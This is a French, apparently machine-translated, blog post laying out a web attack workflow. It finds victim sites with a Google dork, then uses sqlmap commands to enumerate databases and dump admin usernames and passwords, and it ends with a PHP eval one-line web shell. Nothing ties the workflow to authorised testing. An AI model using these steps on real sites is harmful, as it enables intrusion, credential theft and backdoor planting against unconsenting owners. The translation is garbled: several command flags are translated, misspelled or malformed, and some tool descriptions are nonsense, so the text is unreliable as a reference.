utilisation de sqlmap et enregistrements de dynamitage

#Outil d'interception de proxy
mitmproxy -p 8800 #Configurer le proxy

owasp-zap (proxy d'attaque ZAP) est un ensemble complet d'outils de test d'intrusion
pour trouver les vulnérabilités des applications Web. Il comprend des fonctions de proxy d'interception, de proxy automatique, de traitement passif, de craquage par force brute, d'analyse de port et de recherche d'araignée.

Burp Suite est une plate-forme intégrée pour attaquer les applications Web.
Proxy Burp Suite est livré avec un proxy qui s'exécute sur le port par défaut 8080. Utilisez ce proxy.

outil proxy proxyStrike v2.1

Le logiciel de l'agent webscarab comprend un proxy http, un robot d'exploration Web, un araignée Web, une analyse d'ID de session, une interface de script automatique, un outil de test fuzz, un
encodage/décodage de format Web, un langage de description de service WEB, un analyseur SOAP et d'autres modules fonctionnels. webScarab est basé sur le protocole GNU et est écrit en JAVA, c'est l'un des outils utilisés dans WEBGoat

Trouvez des cibles de test via Google Hack :
 Recherche -> company inurl:asp?id=

1. Testez le point d'injection numérique
2. Démontez la base de données et le nom de la table avec sqlmap
3. Videz les données de la table
4. Connectez-vous en arrière-plan

'
Lire la version de la base de données, l'utilisateur actuel, la base de données actuelle
sqlmap -u URL -f -b -current-dbs -curent-user -v 1

sqlmap -u URL --tables #Liste des tables pouvant être attaquées

sqlmap -u URL -T uname --columns #Liste des colonnes utiles

sqlmap -u URL -T uname - C login_name,pass,username --dump #-C spécifie la colonne à trouver, --dump 

Injection SQL d'un site PHP :
1. Testez le point d'injection numérique
2. Sqlmap démonte les noms de base de données et de table
3. Videz les données de la table
4. Utilisez Nikto pour aider à trouver les répertoires cachés
5. Utilisez les informations cachées dans le code de la page Web pour trouver le backend de gestion

sqlmap -u url --dbs --utilisateur-actuel    

sqlmap -u URL --dbs --dbms mysql -D cmxt --tables #cmxt est la base de données

sqlmap -u URL --dbs --dbms mysql --tables #Ne spécifiez pas de base de données


sqlmap -u URL --dbs --dbms mysql -T admin -columns #Afficher les résultats des colonnes

sqlmap -u URL --dbs --dbms mysql -T admin -C user,pwd --dump #Requête de la valeur d'une colonne spécifique

nikto -host nom de domaine principal #Vérifiez le répertoire correspondant du site Web pour vérifier les vulnérabilités existantes.

fiddler :autoresponser renvoie la page Web correspondante. pour élever l’autorité.

<?php eval($_POST[x]);?> Mot de passe en une phrase

Je suppose que tu aimes

Origine blog.csdn.net/davice_li/article/details/131792290
conseillé
Classement